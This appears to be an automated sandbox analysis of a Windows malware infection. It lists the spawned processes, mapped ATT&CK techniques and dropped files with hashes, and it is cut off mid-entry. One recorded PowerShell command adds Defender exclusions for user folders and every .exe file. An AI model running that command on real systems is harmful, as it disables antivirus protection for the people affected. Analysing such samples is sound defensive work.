- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2352 /prefetch:2
    3⤵
    PID:7020
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3516 /prefetch:8
    3⤵
    PID:6228
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3516 /prefetch:8
    3⤵
    PID:8088
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2460 /prefetch:2
    3⤵
    PID:1728
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
    3⤵
    PID:5192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://g-cleanit.hk/
  2⤵
  PID:3976
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa952446f8,0x7ffa95244708,0x7ffa95244718
    3⤵
    PID:5724
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,2950855930507613889,4172340903040229660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
    3⤵
    PID:7476

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:6796

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:7536

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4140

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6532

C:\Users\Admin\AppData\Local\Current\ndebzhaer\FallbackBuffer.exe
C:\Users\Admin\AppData\Local\Current\ndebzhaer\FallbackBuffer.exe
1⤵
PID:5688

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6720

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7684

C:\ProgramData\WindowsServices\WindowsAutHost
C:\ProgramData\WindowsServices\WindowsAutHost
1⤵
PID:5924
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7596

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
PID:7600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1824 -ip 1824
1⤵
PID:7600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1996 -ip 1996
1⤵
PID:7528

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:5860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
384B

MD5
4be7938c6782739b82cedb22d201c678

SHA1
b42912e5702f23636cad17e1659a26bdbff16030

SHA256
470e4a3de44c568c46f7f8e30185c14ccd891f30b569ed4cb9d4822ecc7426c4

SHA512
5e1a1f9657dc5e6d41a58727e630b5203da8ea6cff5e54e0b5962f2b5d469ad2350aada051d4333084bf51f98291c7b72ea6482ba9b1a9c383016f0b1b359148

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
93ad9f7257b608ecae28a40a39415852

SHA1
a069ba8157e0fb445e95affa078b88894a3010c7

SHA256
c9b2f28e26a8dbd6a4c9acc6ad5f68f94a828992befcdc33d0d6a0c5b09f1e94

SHA512
92365f1658a379e8dc273c8b91575d519efad96729a03f91d3f87aba5223b32782933560209bc097171a44546a857f14b9dab571fc8365760bf85658c0f3f86f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
690B

MD5
85b0bbccb9c35ff7b87bbcfa9ed58916

SHA1
77070c35b23016849574f93dfdabb5744fa31ed5

SHA256
323d9d9a8efc1c01e14c0730e8c1950d743cf39ec6f0952a5b8260924e97f635

SHA512
ef97d9119f1c6b7a6facf54c53a074e2f664ff15caf0ddd43432d0b98bda84af83c2875419140f4e7e8ac18bacf253e63718ec8d393321116bef2439a12501a3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
3d5737157513abcdf50b90c259d58ae3

SHA1
13e5737fb8b12dfaa3d9fe1a4e2167db40c5493f

SHA256
ca588ada6e705a15ed5835855dc40ed195be6c29b07b0e6234efd95b31e9d56d

SHA512
5d6a329a9fa846856c7f522f8b2896312e6ec8a79ca105e5a674aaf948c1cfcbb19dd251b1eaf542b90196d8354952298e7316530216b575c8211828b8000536

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
138KB

MD5
47cc6dd8e4fb7ab85041fada79f09cae

SHA1
c52cb7b685e34a809c33cb3e29d7637447d04652

SHA256
057468e3355a4ccce0ffaafa4252be9e3ea5fd4db3d32649cb00f30dc8b472b8

SHA512
ac2e909360017afb198ec6053c3a6dd285ea8a46f9bc45ffcb428be280328264da678f0419351c34833d6f765cf30ea7f18cabdcca5396f004f871cfca505e4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b4a74bc775caf3de7fc9cde3c30ce482

SHA1
c6ed3161390e5493f71182a6cb98d51c9063775d

SHA256
dfad4e020a946f85523604816a0a9781091ee4669c870db2cabab027f8b6f280

SHA512
55578e254444a645f455ea38480c9e02599ebf9522c32aca50ff37aad33976db30e663d35ebe31ff0ecafb4007362261716f756b3a0d67ac3937ca62ff10e25f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c5abc082d9d9307e797b7e89a2f755f4

SHA1
54c442690a8727f1d3453b6452198d3ec4ec13df

SHA256
a055d69c6aba59e97e632d118b7960a5fdfbe35cfdfaa0de14f194fc6f874716

SHA512
ad765cddbf89472988de5356db5e0ee254ca3475491c6034fba1897c373702ab7cfa4bd21662ab862eebb48a757c3eb86b1f8ed58629751f71863822a59cd26c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
180B

MD5
00a455d9d155394bfb4b52258c97c5e5

SHA1
2761d0c955353e1982a588a3df78f2744cfaa9df

SHA256
45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed

SHA512
9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
caec05d88c16e2908d323ad245b0e52a

SHA1
229406af1074dfa02534dbc8ebe9530db065cdbc

SHA256
5d57beb212d7bef13c161689b27797540707818f2b794acbbe760682fa3d068f

SHA512
c2f19b03c3b63f68ea972762c28ff7f9ced80863dd6ed25781bdd164b1b835f4766f918f6e5f7d7f4f5fe5b5e1226d2f522ca043ae59ef48fc009ac13838b9c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ff9a6b349b25b9703d8db4474f610af2

SHA1
1fdc692436a01b1c0f688542f1d4306fed3fad30

SHA256
768ac145eddd4b7db689f8dbb96e78168d1ab8868342af845c794bf016997d6b

SHA512
fd78c3368e6dd85c17b87000cc9157b7b73f8fd3fb92e28c3350167007476dec997aac4f2af6acb3a70cff860715c38da5caa166f4cd58069c94633aa9dff823

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
f14c1ef19777762f1ed6957705392286

SHA1
1817ca56a9f71b35717ce276ed3d5663a854cc8f

SHA256
cec31853eeb2b7a5644679e40c668629975e890a515caa0849fde189daa1aede

SHA512
ec18a7f503587719b848fa9fb64f14164851342046c4d2164e656b56039d25c32a25d066c02476e2efc58643c36510ef12cdfc733d68318cb69f878e8dc91c10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4cd6af2f1287d833130fae63506aefdf

SHA1
c2e49b471e2b9be86d0b83d2320a4efd24420ce6

SHA256
d8018c5127b08c113db8da6878d7abf275652cf9c4d219881cf723544594e60d

SHA512
557537fb506f2c6a0362ac6da510b7cf51314c9413dab9d3e458999c1670e54cc57da3105500b79bc433b580243c480641c71f24ca8c6917eb06aabc5caca20f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\V54QW64X\advdlc[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

Filesize
1KB

MD5
038f3fbc525a1e393fb02720e93f5596

SHA1
f0006dc2274bc9c42fe65c4c3a37cf99cd55cbaa

SHA256
aa6ed54283dbfc156d90b7af7520ed1af1cb403b3d1cb2b541171324776bdf03

SHA512
7d335c036e43b7adb23b3922ebc0c66ede86c53f3ef559682e088fdc09db13acc9e87b940bcbe8f2f3c6db276bbfba914c1ef993002baba2adb4f39268abffca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

Filesize
1KB

MD5
593c72bf4c2a18d7a24f2d181abd0163

SHA1
589fa884b17909d1215015ec7f5ec0599c2ce4c1

SHA256
a9a0a0982fa590f921a494e9390e1ef61661ede1d7110ece914315f6492b39cc

SHA512
3454ee5c287aa080ae225cddf41cbdbfa405b5e8db2ee05b33812a31c44c489e61befecadffc3fcd2189baeef14876eb05e37abdda437f8d065d80661f520755

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

Filesize
1KB

MD5
55df07cb8e6b7526dfb1209c81e19620

SHA1
1f40cedec494641c593b761ab50bc1e46b7b5ab1

SHA256
82955d24bdcbe22fabd60c6b0354e0cd95933dc74f0f64adf61119bd48971ac8

SHA512
00fd3a561fc6538f1697e58dd5fc0c4ce89ddd2fae58c44d882e4c0a14d68663d956f315041b2117248e1b3f9807b21adc225b94fa599f280ed298acae6bb780

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\aero.theme

Filesize
1KB

MD5
1348e4e8fc451e8021f935f4b1376c95

SHA1
c6fecb47e09a1a255cbe9a9f03d91d2100cd1737

SHA256
cdf0440a375c4d4a180a358ea3c87448482622fbc71833bc797ec1410e54bb01

SHA512
ef23469825048d1fdc7f693a9efce5a1bdb8472743917288fa06244c7172d933347d8403440598a9f4062b3514ee313462655e21bc1c1a8dde78cfb607796703

Download Submit
C:\Users\Admin\AppData\Local\Temp\6.exe

Filesize
4.8MB

MD5
5bb3677a298d7977d73c2d47b805b9c3

SHA1
91933eb9b40281e59dd7e73d8b7dac77c5e42798

SHA256
85eb3f6ba52fe0fd232f8c3371d87f7d363f821953c344936ab87728ba6a627f

SHA512
d20f862e9fadb5ad12eddaae8c6ebbfa03d67d35c5ca272e185206eb256cd6a89c338ce608c992df715d36a3f1624a507dbe324a057bd412b87438f4a008f33d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7.exe

Filesize
1.8MB

MD5
d3506cf793362954f36b7e91edf27871

SHA1
85d608f63a13adfb53d2a2ebef716940f79b6ec8

SHA256
219ea8880bc0853180b43fd8bf674b81e1de1f73b4dc75f328023500482148ea

SHA512
69571797ccdffac07fbfa58afdb6b3fea6b91284c7a6b4ae15e0b6e64938f9d3f37417fb27cf7a203b135d1fc2355c43c39588402719f772761a477eaeae83bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe

Filesize
2.7MB

MD5
abf2da5b3e7845f50463a72f8b6e6aaa

SHA1
a5299f55950ca82134da73b9e9844c5d624114c3

SHA256
2a4b1ae0ae67cd31f85680e6351bd5b92ff61e246c158decb1a43a3ef01d9f2c

SHA512
570e8becd18b36d66a2ac295518c8ba3c0bc83d8a6175e601b509efd9237462d1d0826dbeb9e52465e7cdcd57cb4ae7fd859ddc4a5aad895cef6ef7fa981e8a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Confirmed.cmd

Filesize
21KB

MD5
aa910cf1271e6246b52da805e238d42e

SHA1
1672b2eeb366112457b545b305babeec0c383c40

SHA256
f6aeee7fbc6ce536eef6d44e25edf441678d01317d0153dd3bda808c8c0fd25c

SHA512
f012780499c4a0f4bf2a7213976f66ec1769cf611d133f07204c2041b9d6804875b50e37e42feb51073868d5de503e35abbef4682c3191ae0a7b65ff14a64a07

Download Submit
C:\Users\Admin\AppData\Local\Temp\Notepad.exe

Filesize
7.0MB

MD5
150f7378fd18d19ecc002761fa112de5

SHA1
a5ef247183d14dcd0d9b112306c1965c38720a1e

SHA256
b3bfd7d408a13096897fe8cbaff158cb8ff34f6d2d2269b25a1a268daeef387c

SHA512
dd3739f3e7736c6d6319dbf71346addfdab60d668c84b91d9c87bdf5ee7c6ea085b49a314c52338cb196cceb212067fdbf804da91d9f517a34e1b0978ceebb6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe

Filesize
4.0MB

MD5
bd2413c32e34d0031f7881d51ae731ff

SHA1
8771733c460f22adc0e1865f0b3f2ac19e9c1001

SHA256
277e5a809506398685fe20ba674b7f3f75b2e04a34c2b150a84088b266138894

SHA512
612c8b9f86308b13342cef00b9166084bf36f44addd139a0123f84cf9711fb2f03e15e4a0b3d95a6deaafb60bca1cc1436514b2b96f4aaf18b094534c94974cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\_bz2.pyd

Filesize
82KB

MD5
59d60a559c23202beb622021af29e8a9

SHA1
a405f23916833f1b882f37bdbba2dd799f93ea32

SHA256
706d4a0c26dd454538926cbb2ff6c64257c3d9bd48c956f7cabd6def36ffd13e

SHA512
2f60e79603cf456b2a14b8254cec75ce8be0a28d55a874d4fb23d92d63bbe781ed823ab0f4d13a23dc60c4df505cbf1dbe1a0a2049b02e4bdec8d374898002b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\_ctypes.pyd

Filesize
122KB

MD5
2a834c3738742d45c0a06d40221cc588

SHA1
606705a593631d6767467fb38f9300d7cd04ab3e

SHA256
f20dfa748b878751ea1c4fe77a230d65212720652b99c4e5577bce461bbd9089

SHA512
924235a506ce4d635fa7c2b34e5d8e77eff73f963e58e29c6ef89db157bf7bab587678bb2120d09da70594926d82d87dbaa5d247e861e331cf591d45ea19a117

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\_decimal.pyd

Filesize
246KB

MD5
f930b7550574446a015bc602d59b0948

SHA1
4ee6ff8019c6c540525bdd2790fc76385cdd6186

SHA256
3b9ad1d2bc9ec03d37da86135853dac73b3fe851b164fe52265564a81eb8c544

SHA512
10b864975945d6504433554f9ff11b47218caa00f809c6bce00f9e4089b862190a4219f659697a4ba5e5c21edbe1d8d325950921e09371acc4410469bd9189ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\_hashlib.pyd

Filesize
64KB

MD5
b0262bd89a59a3699bfa75c4dcc3ee06

SHA1
eb658849c646a26572dea7f6bfc042cb62fb49dc

SHA256
4adfbbd6366d9b55d902fc54d2b42e7c8c989a83016ed707bd7a302fc3fc7b67

SHA512
2e4b214de3b306e3a16124af434ff8f5ab832aa3eeb1aa0aa9b49b0ada0928dcbb05c57909292fbe3b01126f4cd3fe0dac9cc15eaea5f3844d6e267865b9f7b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\_lzma.pyd

Filesize
155KB

MD5
b71dbe0f137ffbda6c3a89d5bcbf1017

SHA1
a2e2bdc40fdb83cc625c5b5e8a336ca3f0c29c5f

SHA256
6216173194b29875e84963cd4dc4752f7ca9493f5b1fd7e4130ca0e411c8ac6a

SHA512
9a5c7b1e25d8e1b5738f01aedfd468c1837f1ac8dd4a5b1d24ce86dcae0db1c5b20f2ff4280960bc523aee70b71db54fd515047cdaf10d21a8bec3ebd6663358

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\_socket.pyd

Filesize
81KB

MD5
9c6283cc17f9d86106b706ec4ea77356

SHA1
af4f2f52ce6122f340e5ea1f021f98b1ffd6d5b6

SHA256
5cc62aac52edf87916deb4ebbad9abb58a6a3565b32e7544f672aca305c38027

SHA512
11fd6f570dd78f8ff00be645e47472a96daffa3253e8bd29183bccde3f0746f7e436a106e9a68c57cc05b80a112365441d06cc719d51c906703b428a32c93124

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\_wmi.pyd

Filesize
35KB

MD5
c1654ebebfeeda425eade8b77ca96de5

SHA1
a4a150f1c810077b6e762f689c657227cc4fd257

SHA256
aa1443a715fbf84a84f39bd89707271fc11a77b597d7324ce86fc5cfa56a63a9

SHA512
21705b991e75efd5e59b8431a3b19ae5fcc38a3e7f137a9d52acd24e7f67d61758e48abc1c9c0d4314fa02010a1886c15ead5bca8dca1b1d4ccbfc3c589d342e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\base_library.zip

Filesize
1.3MB

MD5
630153ac2b37b16b8c5b0dbb69a3b9d6

SHA1
f901cd701fe081489b45d18157b4a15c83943d9d

SHA256
ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2

SHA512
7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\libcrypto-3.dll

Filesize
5.0MB

MD5
e547cf6d296a88f5b1c352c116df7c0c

SHA1
cafa14e0367f7c13ad140fd556f10f320a039783

SHA256
05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

SHA512
9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\python312.dll

Filesize
6.7MB

MD5
550288a078dffc3430c08da888e70810

SHA1
01b1d31f37fb3fd81d893cc5e4a258e976f5884f

SHA256
789a42ac160cef98f8925cb347473eeeb4e70f5513242e7faba5139ba06edf2d

SHA512
7244432fc3716f7ef27630d4e8fbc8180a2542aa97a01d44dca260ab43966dd8ac98b6023400b0478a4809aace1a128f1f4d6e544f2e591a5b436fd4c8a9d723

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\select.pyd

Filesize
29KB

MD5
8a273f518973801f3c63d92ad726ec03

SHA1
069fc26b9bd0f6ea3f9b3821ad7c812fd94b021f

SHA256
af358285a7450de6e2e5e7ff074f964d6a257fb41d9eb750146e03c7dda503ca

SHA512
7fedae0573ecb3946ede7d0b809a98acad3d4c95d6c531a40e51a31bdb035badc9f416d8aaa26463784ff2c5e7a0cc2c793d62b5fdb2b8e9fad357f93d3a65f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39002\unicodedata.pyd

Filesize
1.1MB

MD5
04f35d7eec1f6b72bab9daf330fd0d6b

SHA1
ecf0c25ba7adf7624109e2720f2b5930cd2dba65

SHA256
be942308d99cc954931fe6f48ed8cc7a57891ccbe99aae728121bcda1fd929ab

SHA512
3da405e4c1371f4b265e744229dcc149491a112a2b7ea8e518d5945f8c259cad15583f25592b35ec8a344e43007ae00da9673822635ee734d32664f65c9c8d9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1io2bu42.kbp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\etc test.exe

Filesize
2.5MB

MD5
e4e8f85ee773cd79bd76dd7798baf957

SHA1
112f53467d2946f2bcf4c55bb4177f25120cda13

SHA256
a0a9aa62080c1a543e11e5853fcd6964e598b59a0a7c24de7a7f1d951177e564

SHA512
99a1dd206181ef20c572a1a1ed9354cc2f70424a4493cd2e67648b54483f90e0bf291764e4731943c6ed73ab872b3fa8410c0368295d5a025330792a17f19dad

Download Submit
C:\Users\Admin\AppData\Local\Temp\natura.exe

Filesize
2.5MB

MD5
c4632a10a964a334e4c4c252283a4256

SHA1
8538000e2e116045f9698e41f9fe1b28eaf86e00

SHA256
a665723cd4b03528486a8128548d7fe825f2ff2e91e9d773ae2d5edb0bdaa8bd

SHA512
